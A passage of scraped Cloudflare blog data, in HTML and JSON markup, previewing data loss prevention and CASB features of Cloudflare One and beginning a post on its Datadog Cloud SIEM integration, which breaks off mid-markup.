height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <!--kg-card-begin: html--><style type=\"text/css\">\n.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;}\n.tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333;\n font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;}\n.tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333;\n font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;}\n.tg .tg-1wig{font-weight:bold;text-align:left;vertical-align:top}\n.tg .tg-bkhz{background-color:#00379C;color:#FFF;font-weight:bold;text-align:left;vertical-align:top}\n.tg .tg-zb5k{text-align:left;text-decoration:underline;vertical-align:top}\n.tg .tg-0lax{text-align:left;vertical-align:top}\n</style>\n<table class=\"tg\" width=\"100%\">\n<thead>\n <tr>\n <th class=\"tg-bkhz\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#FFF;background-color:transparent\">Theme</span></th>\n <th class=\"tg-bkhz\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#FFF;background-color:transparent\">Capability</span></th>\n <th class=\"tg-bkhz\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#FFF;background-color:transparent\">Description</span></th>\n </tr>\n</thead>\n<tbody>\n <tr>\n <td class=\"tg-1wig\" rowspan=\"3\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">DLP: Customizability</span></td>\n <td class=\"tg-zb5k\"><a href=\"/cloudflare-dlp-mip/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Microsoft Information Protection labels integration</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">After a quick API integration, Cloudflare syncs continuously with the Microsoft Information Protection (MIP) labels you already use to streamline how you build DLP policies.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/custom-dlp-profiles/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Custom DLP profiles</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Administrators can create custom detections using the same regex policy builder used across our entire Zero Trust platform for a consistent configuration experience across services.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"https://developers.cloudflare.com/cloudflare-one/policies/data-loss-prevention/dlp-profiles/advanced-settings/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Match count controls</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Administrators can set minimum thresholds for the number of times a detection is made before an action (like block or log) is triggered. This way, customers can create policies that allow individual transactions but block up/downloads with high volumes of sensitive data.</span></td>\n </tr>\n <tr>\n <td class=\"tg-1wig\" rowspan=\"3\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">DLP: Deepening detection</span></td>\n <td class=\"tg-zb5k\"><a href=\"https://developers.cloudflare.com/cloudflare-one/policies/data-loss-prevention/dlp-profiles/advanced-settings/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Context analysis</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Context analysis helps reduce false positive detections by analyzing proximity keywords (for example: seeing “expiration date” near a credit card number increases the likelihood of triggering a detection).</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"https://developers.cloudflare.com/cloudflare-one/policies/gateway/http-policies/#download-and-upload-file-type\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">File type control</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">DLP scans can be scoped to specific file types, such as Microsoft Office documents, PDF files, and ZIP files.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"https://developers.cloudflare.com/cloudflare-one/policies/data-loss-prevention/dlp-profiles/predefined-profiles/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Expanded predefined DLP profiles</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Since launch, DLP has built out a wider variety of detections for common data types, like financial data, personal identifiers, and credentials.</span></td>\n </tr>\n <tr>\n <td class=\"tg-1wig\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">DLP: Detailed detections</span></td>\n <td class=\"tg-zb5k\"><a href=\"https://developers.cloudflare.com/cloudflare-one/insights/logs/gateway-logs/#http-logs\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Expanded logging details</span></a><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\"> </span></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Cloudflare now captures more wide-ranging and granular details of DLP-related activity in logs, including payload analysis, file names, and higher fidelity details of individual files. A large percentage of our customers prefer to push these logs to SIEM tools like </span><a href=\"/integrate-cloudflare-zero-trust-with-datadog-cloud-siem/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">DataDog</span></a><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\"> and </span><a href=\"/zero-trust-signals-to-sumo-logic/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Sumo Logic</span></a><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">.</span></td>\n </tr>\n <tr>\n <td class=\"tg-1wig\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">CASB: Expanding integrations and findings</span></td>\n <td class=\"tg-zb5k\"><a href=\"https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/casb-integrations/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">API-based integrations</span></a><br><a href=\"https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/manage-findings/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Managing findings</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Today, Cloudflare integrates with 18 of the most widely used SaaS apps, including productivity suites, cloud storage, chat tools, and more. </span><br><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">API-based scans not only reveal misconfigurations, but also offer built-in HTTP policy creation workflows and step-by-step remediation guides. </span></td>\n </tr>\n <tr>\n <td class=\"tg-1wig\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">DLP &amp; CASB convergence</span></td>\n <td class=\"tg-zb5k\"><a href=\"https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/casb-dlp/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Scanning for sensitive data in SaaS apps</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Today, organizations can set up CASB to scan every publicly accessible file in Google Workspace for text that matches a DLP profile (financial data, personal identifiers, etc.).</span></td>\n </tr>\n</tbody>\n</table><!--kg-card-end: html-->\n <div class=\"flex anchor relative\">\n <h2 id=\"new-and-upcoming-dlp-casb-functionality\">New and upcoming DLP & CASB functionality</h2>\n <a href=\"#new-and-upcoming-dlp-casb-functionality\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Today’s launch of <a href=\"http://cfl.re/data-protection-press-release\">Cloudflare One’s data protection suite</a> crystalizes our commitment to keep investing in DLP and CASB functionality across these thematic areas. Below we wanted to preview a few new and upcoming capabilities on the Cloudflare One’s data protection suite roadmap that will become available in the coming weeks for further visibility and controls across data environments.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"exact-data-matching-with-custom-wordlists\">Exact data matching with custom wordlists</h3>\n <a href=\"#exact-data-matching-with-custom-wordlists\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p><b>Already shipped:</b> <a href=\"/edm-beta/\">Exact Data Match</a>, moves from out of beta to general availability, allowing customers to tell Cloudflare’s DLP exactly what data to look for by uploading a dataset, which could include names, phone numbers, or anything else.</p><p><b>Next 30 days:</b> Customers will soon be able to upload a list of specific words, create DLP policies to search for those important keywords in files, and block and log that activity.</p><p><b>How customers benefit:</b> Administrators can be more specific about what they need to protect and save time creating policies by bulk uploading the data and terms that they care most about. Over time, many organizations have amassed long lists of terms configured for incumbent DLP services, and these customizable upload capabilities <a href=\"/descaler-program-update/\">streamline migration from other vendors</a> to Cloudflare. Just as with all other DLP profiles, Cloudflare searches for these custom lists and keywords within in-line traffic and in integrated SaaS apps.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"detecting-source-code-and-health-data\">Detecting source code and health data</h3>\n <a href=\"#detecting-source-code-and-health-data\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p><b>Next 30 days:</b> Soon, Clouflare’s DLP will include predefined profiles to detect developer source code and <a href=\"https://www.cloudflare.com/learning/privacy/what-is-hipaa-compliance/\">protected health information (PHI)</a>. Initially, code data will include languages like Python, Javascript, Java, and C++ — four of the most popular languages today — and PHI data will include medication and diagnosis names — two highly sensitive medical topics.</p><p><b>How customers benefit:</b> These predefined profiles expand coverage to some of the most valuable — and in the case of PHI, one of the most regulated — types of data within an organization.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"converging-api-driven-casb-dlp-for-data-at-rest-protections\">Converging API-driven CASB & DLP for data-at-rest protections</h3>\n <a href=\"#converging-api-driven-casb-dlp-for-data-at-rest-protections\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p><b>Next 30 days:</b> Soon, organizations will be able to scan for sensitive data at rest in Microsoft 365 (e.g. OneDrive). API-based scans of these environments will flag, for example, whether credit card numbers, source code, or other data configured via DLP policies reside within publicly accessible files. Administrators can then take prescriptive steps to remediate via in-line CASB gateway policies.</p><p><b>Shipping by the end of the year:</b> Within the next few months, this same integration will be available with GitHub.</p><p><b>How customers benefit:</b> Between the existing <a href=\"https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/casb-dlp/\">Google Workspace</a> integration and this upcoming Microsoft 365 integration, customers can scan for sensitive data across two of the most prominent cloud productivity suites — where users spend much of their time and where large percentages of organizational data lives. This new Microsoft integration represents a continued investment in streamlining security workflows across the Microsoft ecosystem — whether for <a href=\"/expanding-our-collaboration-with-microsoft-proactive-and-automated-zero-trust-security/\">managing identity and application access</a>, <a href=\"/cloudflare-microsoft-intune-partner-to-give-cisos-secure-control-across-devices-applications/\">enforcing device posture</a>, or <a href=\"https://developers.cloudflare.com/cloudflare-one/tutorials/azuread-risky-users/?cf_target_id=9878E2009FA06D9AC4B5552DD9D7E75D\">isolating risky users</a>.</p><p>The GitHub integration also restores visibility over one of the most critical developer environments that is also increasingly a risk for <a href=\"https://www.cloudflare.com/learning/access-management/what-is-dlp/\">data leaks</a>. In fact, according to <a href=\"https://www.gitguardian.com/state-of-secrets-sprawl-report-2023\">GitGuardian</a>, 10 million hard-coded secrets were exposed in public GitHub commits in 2022, a figure that is up 67% from 2021 and only expected to grow. Preventing source code exposure on GitHub is a problem area our product team regularly hears from our customers, and we will continue to prioritize securing developer environments.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"layering-on-zero-trust-context-user-risk-score\">Layering on Zero Trust context: User Risk Score</h3>\n <a href=\"#layering-on-zero-trust-context-user-risk-score\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p><b>Next 30 days:</b> Cloudflare will introduce a risk score based on user behavior and activities that have been detected across Cloudflare One’s services. Organizations will be able to detect user behaviors that introduce risk from action like an Impossible Travel anomaly or detections from too many DLP violations in a given period of time. Shortly following the detection capabilities will be the option to take preventative or remediative policy actions, within the wider Cloudflare One suite. In this way, organizations can control access to sensitive data and applications based on changing risk factors and real-time context.</p><p><b>How customers benefit:</b> Today, intensive time, labor, and money are spent on analyzing large volumes of log data to identify patterns of risk. Cloudflare&#39;s ‘out-of-the-box’ risk score simplifies that process, helping organizations gain visibility into and lock down suspicious activity with speed and efficiency.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"how-to-get-started\">How to get started</h2>\n <a href=\"#how-to-get-started\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>These are just some of the capabilities on our short-term roadmap, and we can’t wait to share more with you as the data protection suite evolves. If you’re ready to explore how Cloudflare One can protect your data, <a href=\"https://www.cloudflare.com/products/zero-trust/plans/enterprise/\">request a workshop</a> with our experts today.</p><p>Or to learn more about how Cloudflare One protects data, read <a href=\"https://cfl.re/data-protection-press-release\">today’s press release</a>, visit our <a href=\"https://www.cloudflare.com/zero-trust/solutions/data-protection\">website</a>, or dive deeper with a <a href=\"https://cfl.re/data-protection-demo\">technical demo</a>.</p>"],"published_at":[0,"2023-09-07T14:00:31.000+01:00"],"updated_at":[0,"2024-10-09T23:25:20.691Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Jr0yPwhJBpZODjwaE87IU/32f2e82142c5cb43355d45a5ed0c863e/cloudflare-one-data-protection-roadmap-preview.png"],"tags":[1,[[0,{"id":[0,"4Z2oveL0P0AeqGa5lL4Vo1"],"name":[0,"Cloudflare One"],"slug":[0,"cloudflare-one"]}],[0,{"id":[0,"4yBlHkuMJq9VSFd341CkxY"],"name":[0,"DLP"],"slug":[0,"dlp"]}],[0,{"id":[0,"6QktrXeEFcl4e2dZUTZVGl"],"name":[0,"Product News"],"slug":[0,"product-news"]}],[0,{"id":[0,"3iAX3DmDBEfSj3TULqvhPD"],"name":[0,"CASB"],"slug":[0,"casb"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Corey Mahan"],"slug":[0,"corey-mahan"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/rO7Nrs04WulaUyysGKjYg/460181b0382fae4856241497c97fbd22/corey-mahan.png"],"location":[0,null],"website":[0,null],"twitter":[0,"@coreymahan"],"facebook":[0,null]}],[0,{"name":[0,"James Chang"],"slug":[0,"james-chang"],"bio":[0,"Product Marketing Manager, Zero Trust"],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2pGRVAYlvhVpBi0PSwIEsm/7e11e4ee95088b7b42e962601b715b6d/james-chang.png"],"location":[0,null],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}],[0,{"name":[0,"Alex Dunbrack"],"slug":[0,"alex-dunbrack"],"bio":[0,"Product manager @Cloudflare, previously co-founder @Vectrix, alum @Y Combinator"],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/73rgMyGhcPKcLk84gVa7pR/5597006a4e659bc31ff6862749681bb8/alex-dunbrack.jpeg"],"location":[0,"San Francisco"],"website":[0,"https://www.linkedin.com/in/alexdunbrack"],"twitter":[0,null],"facebook":[0,null]}],[0,{"name":[0,"Noelle Kagan"],"slug":[0,"noelle"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4mJ1POhjqxk4ugsdEWIzZ3/19785afce2122fdd522375f73ae77bfb/noelle.png"],"location":[0,null],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}]]],"meta_description":[0,"Cloudflare One just launched its data protection suite. This blog previews new functionality to protect data and code in SaaS environments with our DLP and CASB services and looks back on what we have built over the past year."],"primary_author":[0,{}],"localeList":[0,{"name":[0,"What’s next for Cloudflare One’s data protection suite Config"],"enUS":[0,"English for Locale"],"zhCN":[0,"Translated for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"Translated for Locale"],"frFR":[0,"Translated for Locale"],"deDE":[0,"Translated for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"Translated for Locale"],"koKR":[0,"Translated for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"No Page for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/cloudflare-one-data-protection-roadmap-preview"],"metadata":[0,{"title":[0,"What’s next for Cloudflare One’s data protection suite"],"description":[0,"Cloudflare One just launched its data protection suite. This blog previews new functionality to protect data and code in SaaS environments with our DLP and CASB services and looks back on what we have built over the past year."],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/IQz1gKOkKK6RxvG2WMOxO/2adc538b7c2bbe66fff8a0eae02bbb0f/cloudflare-one-data-protection-roadmap-preview-RKg0bT.png"]}]}],[0,{"id":[0,"45DTnvaKqyVXbmubrmQxLM"],"title":[0,"Integrate Cloudflare Zero Trust with Datadog Cloud SIEM"],"slug":[0,"integrate-cloudflare-zero-trust-with-datadog-cloud-siem"],"excerpt":[0,"Today, we are very excited to announce the general availability of Cloudflare Zero Trust Integration with Datadog"],"featured":[0,false],"html":[0,"<p></p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/SCp5IxwJUMOJ6irbWPYHf/4117714bfa2e10409c307dbf48d9e7d2/image5-1.png\" alt=\"Integrate Cloudflare Zero Trust with Datadog Cloud SIEM\" class=\"kg-image\" width=\"1999\" height=\"1126\" loading=\"lazy\"/>\n \n </figure><p>Cloudflare&#39;s Zero Trust platform helps organizations map and adopt a strong security posture. This ranges from Zero Trust Network Access, a Secure Web Gateway to help filter traffic, to Cloud Access Security Broker and Data Loss Prevention to protect data in transit and in the cloud. Customers use Cloudflare to verify, isolate, and inspect all devices managed by IT. Our composable, in-line solutions offer a simplified approach to security and a comprehensive set of logs.</p><p>We’ve heard from many of our customers that they aggregate these logs into Datadog’s Cloud SIEM product. Datadog Cloud SIEM provides threat detection, investigation, and automated response for dynamic, cloud-scale environments. Cloud SIEM analyzes operational and security logs in real time – regardless of volume – while utilizing out-of-the-box integrations and rules to detect threats and investigate them. It also automates response and remediation through out-of-the-box workflow blueprints. Developers, security, and operations teams can also leverage detailed observability data and efficiently collaborate to <a href=\"https://www.cloudflare.com/learning/security/what-is-siem/\">accelerate security investigations</a> in a single, unified platform. We previously had an out-of-the-box dashboard for Cloudflare CDN available on Datadog. These help our customers gain valuable insights into product usage and performance metrics for response times, HTTP status codes, cache hit rate. Customers can collect, visualize, and alert on key Cloudflare metrics.</p><p>Today, we are very excited to announce the general availability of Cloudflare Zero Trust Integration with Datadog. This deeper integration offers the Cloudflare Content Pack within Cloud SIEM which includes out-of-the-box dashboard and detection rules that will help our customers ingesting Zero Trust logs into Datadog, gaining greatly improved security insights over their <a href=\"https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/\">Zero Trust landscape</a>.</p>\n <figure class=\"kg-card kg-image-card kg-width-wide\">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1RYHT6tKmiMbXX3IbZ0jff/f507f8781513f3913b5bb73fd044f818/image4.png\" alt=\"\" class=\"kg-image\" width=\"1999\" height=\"1343\" loading=\"lazy\"/>\n \n </figure><blockquote><p>“<i>Our Datadog SIEM integration with Cloudflare delivers a holistic view of activity across Cloudflare Zero Trust integrations–helping security and dev teams quickly identify and respond to anomalous activity across app, device, and users within the Cloudflare Zero Trust ecosystem. The integration offers detection rules that automatically generate signals based on CASB (cloud access security broker) findings, and impossible travel scenarios, a revamped dashboard for easy spotting of anomalies, and accelerates response and remediation to quickly contain an attacker’s activity through an out-of-the-box workflow automation blueprints.</i>”- <b>Yash Kumar,</b> Senior Director of Product, Datadog</p></blockquote>\n <div class=\"flex anchor relative\">\n <h2 id=\"how-to-get-started\">How to get started</h2>\n <a href=\"#how-to-get-started\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n \n <div class=\"flex anchor relative\">\n <h3 id=\"set-up-logpush-jobs-to-your-datadog-destination\">Set up Logpush jobs to your Datadog destination</h3>\n <a href=\"#set-up-logpush-jobs-to-your-datadog-destination\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Use the Cloudflare dashboard or API to <a href=\"https://developers.cloudflare.com/logs/get-started/enable-destinations/datadog/\">create a Logpush job</a> with all fields enabled for each dataset you’d like to ingest on Datadog. We have eight account-scoped datasets available to use today (Access Requests, Audit logs, CASB findings, Gateway logs including DNS, Network, HTTP; Zero Trust Session Logs) that can be ingested into Datadog.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"install-the-cloudflare-tile-in-datadog\">Install the Cloudflare Tile in Datadog</h3>\n <a href=\"#install-the-cloudflare-tile-in-datadog\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" 